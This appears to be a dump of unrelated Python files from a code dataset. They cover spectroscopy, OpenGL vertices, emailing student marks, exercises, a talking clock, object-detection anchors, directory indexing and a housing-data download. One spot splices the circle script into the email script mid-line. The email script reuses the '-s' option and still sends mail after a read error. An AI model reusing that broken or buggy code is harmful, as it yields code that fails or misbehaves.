rwa, rmin, resp_r) \n nr3td.nr3_r4g(lab, sys, it2, t1s, t3s, rwa, rmin, resp_n)\n \n self._vprint(\" - stimulated emission\")\n # SE\n nr3td.nr3_r1g(lab, sys, it2, t1s, t3s, rwa, rmin, resp_n)\n nr3td.nr3_r2g(lab, sys, it2, t1s, t3s, rwa, rmin, resp_r)\n \n self._vprint(\" - excited state absorption\")\n # ESA\n nr3td.nr3_r1fs(lab, sys, it2, t1s, t3s, rwa, rmin, resp_r)\n nr3td.nr3_r2fs(lab, sys, it2, t1s, t3s, rwa, rmin, resp_n)\n \n # Transfer\n sys.set_population_propagation_matrix(Uee[:,:,tc]-Uc0[:,:,tc])\n \n self._vprint(\" - stimulated emission with transfer\") \n # SE\n nr3td.nr3_r1g_trans(lab, sys, it2, t1s, t3s, rwa, rmin, resp_n)\n nr3td.nr3_r2g_trans(lab, sys, it2, t1s, t3s, rwa, rmin, resp_r)\n \n self._vprint(\" - excited state absorption with transfer\") \n # ESA\n nr3td.nr3_r1fs_trans(lab, sys, it2, t1s, t3s, rwa, rmin, resp_r)\n nr3td.nr3_r2fs_trans(lab, sys, it2, t1s, t3s, rwa, rmin, resp_n)\n \n \n t2 = time.time()\n self._vprint(\"... calculated in \"+str(t2-t1)+\" sec\")\n \n \n #\n # Calculate corresponding 2D spectrum\n #\n \n ftresp = numpy.fft.fft(resp_r,axis=1)\n ftresp = numpy.fft.ifft(ftresp,axis=0)\n reph2D = numpy.fft.fftshift(ftresp)\n \n ftresp = numpy.fft.ifft(resp_n,axis=1)\n ftresp = numpy.fft.ifft(ftresp,axis=0)*ftresp.shape[1]\n nonr2D = numpy.fft.fftshift(ftresp)\n \n \n onetwod = TwoDSpectrumContainer()\n onetwod.set_axis_1(oa1)\n onetwod.set_axis_3(oa3)\n onetwod.set_data(reph2D, dtype=\"Reph\")\n onetwod.set_data(nonr2D, dtype=\"Nonr\")\n \n twods.append(onetwod)\n tc += 1 \n \n return twods\n \n else:\n \n # fall bakc on quantarhei's own implementation\n \n ret = TwoDSpectrumContainer()\n \n \n return ret\n \n \n \n \n ","sub_path":"quantarhei/spectroscopy/twod2.py","file_name":"twod2.py","file_ext":"py","file_size_in_byte":13741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"119548909","text":"#!/usr/local/bin/python2.7\n# encoding: utf-8\n\n'''\nCircle, outline only : GL_LINE_STRIP\nvertices are ordered clockwise : 12, 1, 2, 3, 4, 5...\nnumber of vertices per half-circle for a smooth result is : radius/5 +3\n'''\n\n#--- IMPORTS ------------------------------------------------------------------\nfrom math import pi, sin, cos\nfrom bw import *\n\n##--- CONSTANTS AND VARIABLES -------------------------------------------------\nradius=100\nstepangle = pi/(int(radius/5)+3)\nphi=0\nverts=[]\n\n#--- VERTEX GENERATION --------------------------------------------------------\nverts.append((0, radius))\nwhile phi NoneType\n\n Send an email to recepient with subject line subject and message\n body message_body.\n\n '''\n\n # Build the message header\n header = ('From: %s\\nTo: %s\\nSubject: %s\\r\\n\\r\\n' %\n (sender, recipient, subject))\n\n # Actually send the message\n with os.popen('%s -t' % (sendmail_loc), 'w') as email:\n email.write(header + message_body)\n\n\ndef send_mails(students, subject, path_pref, path_suff):\n '''({str: Student}, str, str, str) -> NoneType\n\n Send an email to each student in the dictionary of Students (by\n student_id), with subject subject and the message body being the\n contents of a file path_pref/Student.utorid/path_suff.\n\n '''\n\n for student in students.values():\n try:\n with open(os.path.join(path_pref,\n student.student_id,\n path_suff)) as markfile:\n body = markfile.read()\n except IOError as error:\n print('No result for %s: %s' % (student.student_id, error))\n\n send_mail(student.email, subject, body)\n\n\nif __name__ == '__main__':\n\n # get args\n PARSER = argparse.ArgumentParser(\n description=('Email contents of result files to students.\\n'))\n PARSER.add_argument('-s', '--subject', help='The subject line.')\n PARSER.add_argument(\n '-c', '--classlist',\n help='Path to the classlist file in BlackBoard format.')\n PARSER.add_argument(\n '-p', '--path_prefix',\n help=('Prefix of the path to the file to email: ' +\n 'up to student submission directory.'))\n PARSER.add_argument(\n '-s', '--path_suffix',\n help=('Sufffix of the path to the file to email: ' +\n 'from the student submission directory.'))\n ARGS = PARSER.parse_args()\n\n # email\n with open(ARGS.classlist) as clslist:\n send_mails(load_bb(clslist),\n ARGS.subject,\n ARGS.path_prefix if ARGS.path_prefix else '',\n ARGS.path_suffix if ARGS.path_suffix else '')\n","sub_path":"utils/emailmarks.py","file_name":"emailmarks.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"71045450","text":"\"\"\"\nGiven a series as shown below:\n\n 1 2\n 3 4 5 6\n 7 8 9 10 11 12\n 13 14 15 16 17 18 19 20\n ..........................\n ............................\n (so on)\n\nYou are given a number N, you need to write a program to find the sum of all elements in the N-th row of above series.\n\nInput:\nFirst line of input contains a single integer T which denotes the number of test cases. First line of each test case contains a single intger N.\n\nOutput:\nFor each test case, print the sum of all the elements present in Nth row of above series.\n\nConstraints:\n1<=T<=100\n1<=N<=100\n\nExample:\nInput:\n2\n2\n4\nOutput:\n18\n132\n\"\"\"\n\n\ndef sum_terms_nth_row(n):\n count = 0\n a = n * (n - 1) + 1\n b = n * (n + 1)\n for x in range(a, b + 1):\n count += x\n return count\n\n\nif __name__ == '__main__':\n t = int(input())\n for i in range(t):\n n = int(input())\n print(sum_terms_nth_row(n))\n","sub_path":"practice/Basic/sum_terms_nth_row.py","file_name":"sum_terms_nth_row.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"529721703","text":"\"\"\"ROSARIO VALERO MIRANDA - 1º DAW - PRACTICA5 - EJERCICIO 8\r\nEscriu un programa que et demani primer un nombre i després et demani nombres\r\nfins a què la suma dels nombres introduïts coincideixi amb el nombre inicial.\r\nEl programa termina escribint la llista de nombres.\"\"\"\r\n\r\nprint(\"Introduce el número limite\")\r\nnum=int(input())\r\n\r\nprint(\"Introduce un valor\")\r\nnum1=int(input())\r\n\r\n\r\nlista=[]\r\n\r\nwhile num1>num:\r\n print(num1,\"es más grande.Introduce otro valor\")\r\n num1=int(input())\r\nnum=num-num1\r\nlista.append(num1)\r\n\r\nwhile num>0:\r\n print(\"Introduce otro valor\")\r\n num1=int(input())\r\n \r\n while num1>num:\r\n print(num1,\"es demasiado grande.Introduce otro valor\")\r\n num1=int(input())\r\n num=num-num1\r\n lista.append(num1)\r\n\r\nprint(\"El limite a superar es\", num, \".La lista creada és\", lista)\r\n","sub_path":"Ejercicios-Pr5/ejercicio8.py","file_name":"ejercicio8.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"337955461","text":"#!/usr/bin/env python3\n\n# Sam Kim\n# \n# This is my solution to Talking Clock, implemented with the bonus verbal part.\n# The user will continually prompt the user to input any time (24H format)\n# and the given time will be read aloud and displayed on the console as output.\n# The user can also press 'Enter' to get the current time.\n#\n# Requires:\n# - Python 3\n# - PyAudio module (https://people.csail.mit.edu/hubert/pyaudio/)\n# - /sounds/ in same directory as this file\n\nimport pyaudio\nimport wave\nimport datetime\n\n# Global variable to play special sound in def play_audio(...)\nCURRENT_TIME = False\n\ndef get_hour_str(hour_int):\n hours = {\"0\":\"twelve\",\n \"1\":\"one\",\n \"2\":\"two\",\n \"3\":\"three\",\n \"4\":\"four\",\n \"5\":\"five\",\n \"6\":\"six\",\n \"7\":\"seven\",\n \"8\":\"eight\",\n \"9\":\"nine\",\n \"10\":\"ten\",\n \"11\":\"eleven\"}\n\n return hours[str(hour_int % 12)] + \" \"\n\ndef get_min_str(min_int):\n\n min_tens = {\"0\":\"\",\n \"1\":\"ten\",\n \"2\":\"twenty\",\n \"3\":\"thirty\",\n \"4\":\"forty\",\n \"5\":\"fifty\"}\n\n min_ones = {\"0\":\"\",\n \"1\":\"one\",\n \"2\":\"two\",\n \"3\":\"three\",\n \"4\":\"four\",\n \"5\":\"five\",\n \"6\":\"six\",\n \"7\":\"seven\",\n \"8\":\"eight\",\n \"9\":\"nine\"}\n\n min_teens = {\"10\":\"ten\",\n \"11\":\"eleven\",\n \"12\":\"twelve\",\n \"13\":\"thirteen\",\n \"14\":\"fourteen\",\n \"15\":\"fifteen\",\n \"16\":\"sixteen\",\n \"17\":\"seventeen\",\n \"18\":\"eighteen\",\n \"19\":\"nineteen\"}\n\n min_ten_int = min_int // 10\n min_ones_int = min_int % 10\n\n result = \"\"\n\n if (min_int == 0):\n return \"\"\n elif (min_int < 10):\n result = \"oh \" + min_ones[str(min_ones_int)]\n elif (min_int < 20):\n result = min_teens[str(min_int)]\n else:\n if (min_ones_int % 10 == 0):\n result = min_tens[str(min_ten_int)]\n else:\n result = min_tens[str(min_ten_int)] + \" \" + min_ones[str(min_ones_int)] \n\n return result + \" \"\n\ndef get_ampm_str(hour_int):\n return \"AM\" if (hour_int < 12) else \"PM\"\n\n# Given a valid time, prints a string of how the time would be read in English\ndef solution(time_str):\n\n hour_int = int(time_str[:time_str.index(':')])\n min_int = int(time_str[time_str.index(':') + 1:])\n \n play_audio(str(hour_int % 12), str(min_int), get_ampm_str(hour_int).lower())\n global CURRENT_TIME\n\n if CURRENT_TIME:\n start_str = \"It's currently \"\n CURRENT_TIME = False\n else:\n start_str = \"It's \"\n\n print((start_str + get_hour_str(hour_int) +\n get_min_str(min_int) + get_ampm_str(hour_int) + \"\\n\"))\n\n# For testing and main(), returns a list of all possible 24H times\ndef get_all_times():\n tests = []\n\n for i in range(24):\n for minute in range(60):\n hour = (\"0\" + str(i)) if (i < 10) else str(i)\n minute = (\"0\" + str(minute)) if (minute < 10) else str(minute)\n test = hour + \":\" + minute\n tests.append(test)\n\n return tests\n\n# Taken from PyAudio Docs (https://people.csail.mit.edu/hubert/pyaudio/docs/)\n# Plays a .wav file\ndef play_wf(path):\n CHUNK = 1024\n\n wf = wave.open(path, 'rb')\n\n # instantiate PyAudio (1)\n p = pyaudio.PyAudio()\n\n # open stream (2)\n stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),\n channels=wf.getnchannels(),\n rate=wf.getframerate(),\n output=True)\n\n # read data\n data = wf.readframes(CHUNK)\n\n # play stream (3)\n while len(data) > 0:\n stream.write(data)\n data = wf.readframes(CHUNK)\n\n # stop stream (4)\n stream.stop_stream()\n stream.close()\n\n # close PyAudio (5)\n p.terminate()\n\n# Plays the necessary audio given hour, minute, and am/pm strings\ndef play_audio(hour, min, ampm):\n # Special horn for current time\n if CURRENT_TIME:\n play_wf(\"./sounds/announcement.wav\")\n\n # \"It's\"\n play_wf(\"./sounds/its.wav\")\n\n # hour\n if hour in [\"0\", \"12\"]: hour = \"12\"\n play_wf(\"./sounds/%s.wav\" % hour)\n\n # minute\n if min == \"0\":\n min = \"00\"\n elif int(min) < 10:\n play_wf(\"./sounds/o.wav\")\n play_wf(\"./sounds/%s.wav\" % min)\n\n # \"AM\" or \"PM\"\n play_wf(\"./sounds/%s.wav\" % ampm)\n\n# Loop until user wants to quit\ndef main():\n global CURRENT_TIME\n proper_times = get_all_times()\n print (\"Hi, welcome to my solution to Talking Clock...\\n\")\n\n while (True):\n time = input( (\"Input any valid time formatted like '00:00'.\\n\" + \n \"Press Enter for the current time.\\n\" + \n \"Enter 'q' to quit...\\n> \") ).strip()\n if (time.lower() == \"q\"):\n return\n elif (time == \"\"):\n now = datetime.datetime.now()\n time = str(now.hour) + \":\" + str(now.minute)\n CURRENT_TIME = True\n elif (time not in proper_times):\n print (\"Oops! Try again...\")\n continue\n\n solution(time)\n\nif __name__ == \"__main__\":\n main()","sub_path":"Challenge #321 [Easy] Talking Clock/talking_clock.py","file_name":"talking_clock.py","file_ext":"py","file_size_in_byte":5314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"326877701","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\"\"\"\nBIOL7800 Assignment 5 Task 1\n\nAmie Settlecowski\n2 Feb. 2016\n\n\"\"\"\n\n\ndef cheer():\n\n count = [str(n) for n in range(2, 9, 2)]\n phrase = 'Who do we appreciate?'\n count_str = str((','.join(count)))\n print(count_str, ':', phrase)\n\ncheer()\n","sub_path":"answers/amiesett/task1_settlecowski.py","file_name":"task1_settlecowski.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"52256136","text":"import os \r\n\r\n\r\nos.environ['CUDA_DEVICE_ORDER'] = 'PCI_BUS_ID'\r\nos.environ['CUDA_VISIBLE_DEVICES'] = \"0\"\r\n\r\n\r\nimport tensorflow as tf \r\nimport numpy as np \r\n\r\nfrom np_anchors import create_target_assigner, batch_assign_targets, Anchor\r\nfrom object_detection import np_box_list as box_list\r\nfrom retinanet import retinanet\r\n\r\n\r\n# format: ymin,xmin, ymax, xmax\r\ntest_gt_boxes_list= [[\r\n [0.1, 0.1, 0.2,0.2],\r\n [0.3,0.3, 0.7,0.7],\r\n [0.8,0.8,0.9,0.9]\r\n] ]\r\n\r\ntest_gt_labels_list= [ [\r\n 1,2\r\n] ]\r\n\r\ntest_gt_boxes_list = np.array(test_gt_boxes_list,dtype=np.float32)\r\ntest_gt_labels_list = np.array(test_gt_labels_list, dtype=np.int32)\r\n# need to prepare this as one-hot vector format...\r\n\r\ndef create_one_hot_vector_gt_labels(gt_labels_index_list, vector_length):\r\n \"\"\"\r\n gt_labels_index_list: [batch,num_gt_labels] shaped np array with dtype int.\r\n \"\"\"\r\n batch_size = gt_labels_index_list.shape[0]\r\n gt_label_num = gt_labels_index_list.shape[1]\r\n empty_array = np.zeros((batch_size,gt_label_num, vector_length), dtype=np.float32)\r\n # empty_array[np.arange(gt_label_num), gt_labels_index_list] = 1\r\n \r\n # print(\"batch size:{}\".format(batch_size))\r\n batch_list=[]\r\n\r\n for batch_index in range(batch_size):\r\n single_gt_labels_index_list = gt_labels_index_list[batch_index]\r\n empty_array[batch_index,np.arange(gt_label_num), single_gt_labels_index_list] = 1.\r\n\r\n print(\"finished empty_array:{}\".format(empty_array))\r\n return empty_array\r\n\r\n\r\n\r\n\r\ndef _get_feature_map_shape(feature_map_list):\r\n output=[]\r\n for feature_map in feature_map_list:\r\n print(feature_map)\r\n shape = feature_map.get_shape().as_list()\r\n print(shape)\r\n output.append( (shape[1], shape[2]) )\r\n\r\n return output\r\n\r\ndef _assign_targets(gt_boxes_list, gt_labels_list, target_assigner, anchors):\r\n \"\"\"\r\n Assign gt targets\r\n Args:\r\n gt_boxes_list: a list of 2-D tensor of shape [num_boxes, 4] containing coordinates of gt boxes\r\n gt_labels_list: a list of 2-D one-hot tensors of shape [num_boxes, num_classes] containing gt classes\r\n Returns:\r\n batch_cls_targets: class tensor with shape [batch_size, num_anchors, num_classes]\r\n batch_reg_target: box tensor with shape [batch_size, num_anchors, 4]\r\n match_list: a list of matcher.Match object encoding the match between anchors and gt boxes for each image\r\n of the batch, with rows corresponding to gt-box and columns corresponding to anchors\r\n \"\"\"\r\n gt_boxlist_list = [box_list.BoxList(boxes) for boxes in gt_boxes_list]\r\n # gt_labels_with_bg = [tf.pad(gt_class, [[0, 0], [1, 0]], mode='CONSTANT')\r\n # for gt_class in gt_labels_list]\r\n anchors_boxlist = box_list.BoxList(anchors)\r\n print(\"inside _assign_targets, anchors_boxlist data={}\".format(anchors_boxlist.get()) )\r\n return batch_assign_targets(target_assigner,anchors_boxlist,gt_boxlist_list,gt_labels_list)\r\n\r\n\r\nimage_shape=(224,224)\r\n\r\nnum_classes=2\r\nnum_scales = 2\r\naspect_ratios = (1.0, 2.0, 0.5)\r\nanchor_scale = 4.0\r\n\r\ntest_gt_labels_list = create_one_hot_vector_gt_labels(test_gt_labels_list, num_classes+1)\r\n\r\n\r\nnum_anchors_per_loc = num_scales * len(aspect_ratios)\r\n\r\ninputs = tf.placeholder(tf.float32, shape=(1,224,224,3))\r\n\r\nprediction_dict = retinanet(inputs, num_classes, num_anchors_per_loc, is_training=True)\r\n\r\n\r\n\r\nfeature_map_shape_list = _get_feature_map_shape(prediction_dict[\"feature_map_list\"])\r\nanchor_generator = Anchor(feature_map_shape_list=feature_map_shape_list,\r\n img_size=image_shape,\r\n anchor_scale=anchor_scale,\r\n aspect_ratios=aspect_ratios,\r\n scales_per_octave=num_scales)\r\n\r\nanchors = anchor_generator.boxes\r\n\r\nprint(\"anchors shape:{}\".format(anchors.shape))\r\n\r\n# unmatched_class_label = tf.constant((num_classes + 1) * [0], tf.float32)\r\nunmatched_class_label = np.array((num_classes + 1) * [0], dtype=np.float32)\r\ntarget_assigner = create_target_assigner(unmatched_cls_target=unmatched_class_label)\r\n\r\n\r\n\r\n_assign_targets(test_gt_boxes_list, test_gt_labels_list, target_assigner, anchors)","sub_path":"create_anchor.py","file_name":"create_anchor.py","file_ext":"py","file_size_in_byte":4294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"513559873","text":"import os, csv, fnmatch\nimport time\nimport sys\nimport re\n#==============================================================================\ndef getFileTypes(fileName):\n if '.png' in fileName or '.jpg' in fileName:\n fileType = 'Image'\n elif '.csv' in fileName:\n fileType = 'CSV'\n elif '.xls' in fileName or '.xlsx' in fileName:\n fileType = 'Excel'\n elif '.txt' in fileName:\n fileType = 'Text'\n else:\n fileType = 'Unidentified'\n return fileType\n\ndef getFullFilePath(imFileList, dirName):\n fullFilePath = []\n for fileName in fnmatch.filter(imFileList, '*.*'):\n fullFilePath.append(os.path.join(dirName, fileName))\n return fullFilePath\n \ndef getCouponName(fileName):\n regex = re.compile(\"[0-9]{0,}[\\\\-_][0-9]{0,}[\\\\-_][0-9]{0,}\")\n matchArray = regex.findall(fileName)\n if(matchArray):\n return matchArray[0].replace('_', '-')\n else:\n return ''\n \ndef getImageAttributes(fileName):\n if '.png' in fileName or '.jpg' in fileName:\n name = fileName.split('.')[0]\n nameTypes = name.split('-')\n series = nameTypes[0]\n panel = nameTypes[1]\n coupon = nameTypes[2]\n attributes = [series, panel, coupon]\n return attributes\n else:\n return []\n \ndef getSeries(dirName):\n if 'DOE_I/' in dirName or 'DOE_I_' in dirName:\n return 'Series 2'\n elif 'DOE_II/' in dirName or 'DOE_II_' in dirName:\n return 'Series 6'\n elif 'DOE_IV/' in dirName or 'DOE_IV_' in dirName:\n return 'Series 10'\n#==============================================================================\n\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 2:\n print(\"Error in arguments passed.\\nStandard input format:\")\n print(\"$python3 \")\n sys.exit()\n datetime = time.strftime(\"%Y%m%d_%H%M%S\")\n nameOfCSV = 'graphFilePath_run_'+datetime+'.csv'\n nameOfDirectoryCsv = 'graphDirectory_run_'+datetime+'.csv'\n rootDirectory= sys.argv[1]\n headerSetFlag = False\n cleanedList = []\n couponList = list()\n dirList = list()\n #==============================================================================\n #creating the header row\n \n headerRow = [\"FullFilePath\",\"FileTypes\", \"CurrentDirectoryName\",\"SeriesName\",\\\n \"AllFileList\", \"CouponName\", \"Series\",\"Panel\", \"Coupon\"]\n \n #============================================================================== \n \n \n #creating the CSV file=========================================================\n with open(nameOfCSV, 'a',newline='') as csvFile:\n w = csv.writer(csvFile)\n w.writerow(headerRow)\n headerforDir = ['currentDirectory','currLabel', 'parentDirectory','PLabel', 'childDirectory', 'CLabel', \\\n 'NumOfFilesInside', 'NumofSubDir', 'SubDirLabels', 'FilePathsInsideCurr']\n with open(nameOfDirectoryCsv, 'a',newline='') as csvFileD:\n ww = csv.writer(csvFileD)\n ww.writerow(headerforDir)#write the header row\n for dirName, subDirList, imFileList in os.walk(rootDirectory):\n depth = len(dirName.rstrip(os.path.sep).split(os.path.sep))#find the depth of the curr dir\n currLabel = dirName.rstrip(os.path.sep).split(os.path.sep)[-1]#current directory label \n fullFilePath = getFullFilePath(imFileList, dirName) #get full path names for files.\n if depth >1:\n isOfSubDir = (os.path.sep).join((dirName.rstrip(os.path.sep).split(os.path.sep)[:-1])) #the parent directory\n Plabel = (dirName.rstrip(os.path.sep).split(os.path.sep)[-2])#parent directory label\n else:\n isOfSubDir = ''\n Plabel =''\n dirList = [dirName.strip().replace(' ','_'), currLabel.strip().replace(' ','_'),\\\n isOfSubDir.strip().replace(' ','_') ,Plabel.strip().replace(' ','_'),'','',\\\n len(imFileList),len(subDirList),','.join(subDirList).strip().replace(' ','_'),\\\n ','.join(fullFilePath).strip().replace(' ','_')]\n try:\n ww.writerow(dirList)#write the header of each level \n except:\n pass\n \n #for the stuff inside the subdirectories\n for bfsDir in subDirList:\n depth = len(dirName.rstrip(os.path.sep).split(os.path.sep))\n currLabel = dirName.rstrip(os.path.sep).split(os.path.sep)[-1]#current directory label\n filePathForSD = getFullFilePath(imFileList, dirName) #get full path names for files.\n if depth >1:\n isOfSubDir = (os.path.sep).join((dirName.rstrip(os.path.sep).split(os.path.sep)[:-1])) #the parent directory\n Plabel = (dirName.rstrip(os.path.sep).split(os.path.sep)[-2])\n else:\n isOfSubDir = ''\n Plabel = ''\n\n Clabel = bfsDir.split(os.path.sep)[-1]\n dirList = [dirName.strip().replace(' ','_') , currLabel.strip().replace(' ','_'),\\\n isOfSubDir.strip().replace(' ','_'), Plabel.strip().replace(' ','_') ,\\\n os.path.join(dirName, bfsDir).strip().replace(' ','_') ,Clabel.strip().replace(' ','_'),\\\n len(imFileList), '','',','.join(filePathForSD).strip().replace(' ' ,'_')]\n try:\n ww.writerow(dirList)\n except:\n pass\n \n #for individual files\n for fileName in fnmatch.filter(imFileList, '*.*'):\n filePath = os.path.join(dirName, fileName).strip().replace(' ','_')\n currentDirName = dirName.rstrip(os.path.sep).split(os.path.sep)[-1].strip().replace(' ','_')\n couponName = getCouponName(fileName)\n splitcoupon = couponName.split('-') if len(couponName) != 0 else ['','','']\n cleanedList = [filePath.strip().replace('\\\\','/'), getFileTypes(fileName), dirName.strip().replace('\\\\','/'),\\\n getSeries(dirName),fileName.strip().replace(' ','_'), couponName, str(splitcoupon[0]),\\\n str(splitcoupon[1]), str(splitcoupon[2])]\n if(len(couponName)>0): \n splitcoupon.insert(0,couponName)\n if (len(cleanedList) != 0):\n try: \n w.writerow(cleanedList)\n except:\n pass\n \n #closing the CSV file=========================================================\n csvFile.close()\n csvFileD.close()\nprint(\"Conversion done.\\nFilenames are --> \")\nprint(\"1. For Directory Structure - {} \\n2. For FileStructure Associated with domain knowledge - {}\".format(nameOfDirectoryCsv,nameOfCSV))\n\n\n","sub_path":"darpa-CSSubteaam/pathTraversal/pathTraversal.py","file_name":"pathTraversal.py","file_ext":"py","file_size_in_byte":7184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"364167089","text":"import csv\nimport numpy as np\n\namps = 300\nnormalise = 1\n\ngap = 50\ndata = []\ndataArray = []\n\nr2 = 200\nr1 = r2-gap\n\ncorrFactor = (r1/gap)*(np.log((r1+gap)/r1))\nprint(corrFactor, r1+gap)\n\na, b = \"\", \"\"\n\n\n# print(\"gap = \", gap)\nwith open(\"./CTLM/{}.txt\".format(gap)) as file:\n data = np.asarray(file.readlines())\n\ndata = np.asarray(data[1:])\n# print(data)\n# print('len= ', len(data))\nresistance = np.zeros(0)\nfor j in range(len(data)):\n # print(\"j = \", j)\n dataArray.append(data[j].split('\\t'))\n # print(\"here\")\n # print(dataArray[j])\n if float(dataArray[j][0]) != 0:\n resistance = np.append(resistance, (float(dataArray[j][1])/(0.001*float(dataArray[j][0]))))\n # print(float(dataArray[j][1]), float(dataArray[j][0]), resistance)\n dataArray[j][1] = dataArray[j][1][:-1]\n a = \"({},{})\\n\".format(dataArray[j][0], dataArray[j][1])\n b += a\n\n# print(resistance)\nfinalResistance = np.median(resistance)\n# print(finalResistance)\n\ncounter = 0\nfor i in range(len(resistance)):\n if resistance[i] > 1.1*finalResistance or resistance[i] < 0.9*finalResistance:\n resistance[i] = 0\n counter += 1\n# print(\"counter =\", counter)\n# print(np.max(resistance))\nfinalResistance = np.average(resistance)\n# print(finalResistance)\nfinalResistance = np.average(resistance)*(len(resistance)/(len(resistance)-counter))\ncorrResistance = finalResistance/corrFactor\n# print((len(resistance)/(len(resistance)-counter)))\n# print(finalResistance)\n\n\n\n# squaredError = np.square(finalResistance-resistance)\n# # print(squaredError)\n# meanSquared = 0\n# for i in range(len(resistance)):\n# meanSquared += squaredError[i]\n\n# # print(meanSquared, np.max(squaredError))\n# meanSquared = (np.sum(squaredError))/len(squaredError)\n# # print(meanSquared)\n\n# counter = 0\n# for i in range(len(squaredError)):\n# if squaredError[i] > 0.1*meanSquared:\n# squaredError[i] = 0\n# counter += 1\n \n# # print(\"counter ={}\".format(counter))\n# meanSquared = (np.sum(squaredError))/(len(squaredError)-counter)\n\n# print('here')\n# print(len(squaredError))\n# print(meanSquared)\n\nb = \"({},{})\\n\".format(gap, corrResistance)\nfile1 = open(\"./angus_bruce/processed/CTLM_res_corr_output.txt\".format(gap),mode=\"a\")#append mode \nfile1.write(b) \nfile1.close()\n \n # data0, data1 = np.hsplit(data[i],)\n\n\n# with open('./angus_bruce/spectrum_{}mA.csv'.format(amps), newline='') as csvfile:\n# data = list(csv.reader(csvfile))\n\n# if data:\n# numberRows = len(data)\n\n# semiFinder = [-1] * numberRows\n# counter = 0\n\n# for i in range(numberRows):\n# semiFinder[i] = data[i][0].find(';')\n# if semiFinder[i] == 16:\n# counter += 1\n\n# a = []\n# b = []\n\n# for i in range(numberRows):\n# if semiFinder[i] == 16:\n# try:\n# # a = \"({},{})\\n\".format(float(data[i][0].split(\";\")[0]), float(data[i][0].split(\";\")[1]))\n# a = [float(data[i][0].split(\";\")[0]), float(data[i][0].split(\";\")[1])]\n# b.append(a)\n# except ValueError:\n# print(\"On line {}, not a number, skipping...\".format(i))\n\n# b = np.asarray(b)\n\n# if normalise == 1:\n# print(\"Normailising\")\n# b0, b1 = np.hsplit(b, 2)\n# print(b0)\n# print(b1)\n# b1 /= np.max(b1)\n# b = np.column_stack((b0, b1))\n# print(\"Normailised\")\n# print(b)\n\n# output = \"\"\n\n# print(np.shape(b))\n# print(len(b))\n\n# for i in range(len(b)):\n# a = \"({},{})\\n\".format(b[i][0], b[i][1])\n# output += a\n\n# file1 = open(\"./angus_bruce/processed/spectrum_{}mA_output.txt\".format(amps),\"w\")#write mode \n# file1.write(output) \n# file1.close()","sub_path":"Figures/ctlm_convert_to_latex_correction.py","file_name":"ctlm_convert_to_latex_correction.py","file_ext":"py","file_size_in_byte":3583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"845362","text":"import os\nimport tarfile\nfrom six.moves import urllib\nimport pandas as pd\n\ndownload_root = \"https://raw.githubusercontent.com/ageron/handson-ml/master/\"\nHOUSING_PATH = \"../data_deal/datasets/housing\"\nHOUSING_URL = download_root + HOUSING_PATH + \"/housing.tgz\"\n\n\ndef fetch_housing_data(housing_url=HOUSING_URL, housing_path=HOUSING_PATH):\n if not os.path.isdir(housing_path):\n os.makedirs(housing_path)\n tgz_path = os.path.join(housing_path,'housing.tgz')\n urllib.request.urlretrieve(housing_url,tgz_path)\n housing_tgz = tarfile.open(tgz_path)\n housing_tgz.extractall(path=housing_path)\n housing_tgz.close()\n\n\n# fetch_housing_data()\n\ndef load_housing_data(housing_path = HOUSING_PATH):\n csv_path = os.path.join(housing_path,\"housing.csv\")\n return pd.read_csv(csv_path)\n\n# housing_data = load_housing_data()\n# print(housing_data.info())\n\n# print(housing_data[\"ocean_proximity\"].value_counts())\n'''\n<1H OCEAN 9136\nINLAND 6551\nNEAR OCEAN 2658\nNEAR BAY 2290\nISLAND 5\nName: ocean_proximity, dtype: int64\n'''\n\n\n'''\n获得数据集\n\n\nRangeIndex: 20640 entries, 0 to 20639\nData columns (total 10 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 longitude 20640 non-null float64\n 1 latitude 20640 non-null float64\n 2 housing_median_age 20640 non-null float64\n 3 total_rooms 20640 non-null float64\n 4 total_bedrooms 20433 non-null float64\n 5 population 20640 non-null float64\n 6 households 20640 non-null float64\n 7 median_income 20640 non-null float64\n 8 median_house_value 20640 non-null float64\n 9 ocean_proximity 20640 non-null object \ndtypes: float64(9), object(1)\nmemory usage: 1.6+ MB\n\n'''\n","sub_path":"data_deal/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"226592583","text":"#!/usr/bin/python\nfrom math import sqrt, exp\n\ndef fkt(x,r):\n n = len(x)\n out1 = 0\n out2 = 0\n c = 100\n damp = n**2\n rij = [0]*5\n\n for i in xrange(0, n, 2):\n for j in xrange(i + 2, n, 2):\n dist = (x[i] - x[j]) ** 2 + (x[i + 1] - x[j + 1]) ** 2\n out1 = out1 + sqrt(dist)\n rij = r[(i)/2]+r[(j)/2]\n out2 = out2 + (rij**2 - dist) * exp((c/rij**2)*(rij**2-dist));\n\n out = (out1 + out2) * damp\n return out\n","sub_path":"acp/fkt.py","file_name":"fkt.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"280088479","text":"import numpy as np\n\n\nclass NeuralNetwork:\n def __init__(self, layers, alpha=0.1):\n # initialize the list of weights matrices, then store the\n # network architecture and learning rate\n self.W = []\n self.layers = layers\n self.alpha = alpha\n for i in np.arange(0, len(layers) - 2):\n # randomly initialize a weight matrix connecting the\n # number of nodes in each respective layer together,\n # adding an extra node for the 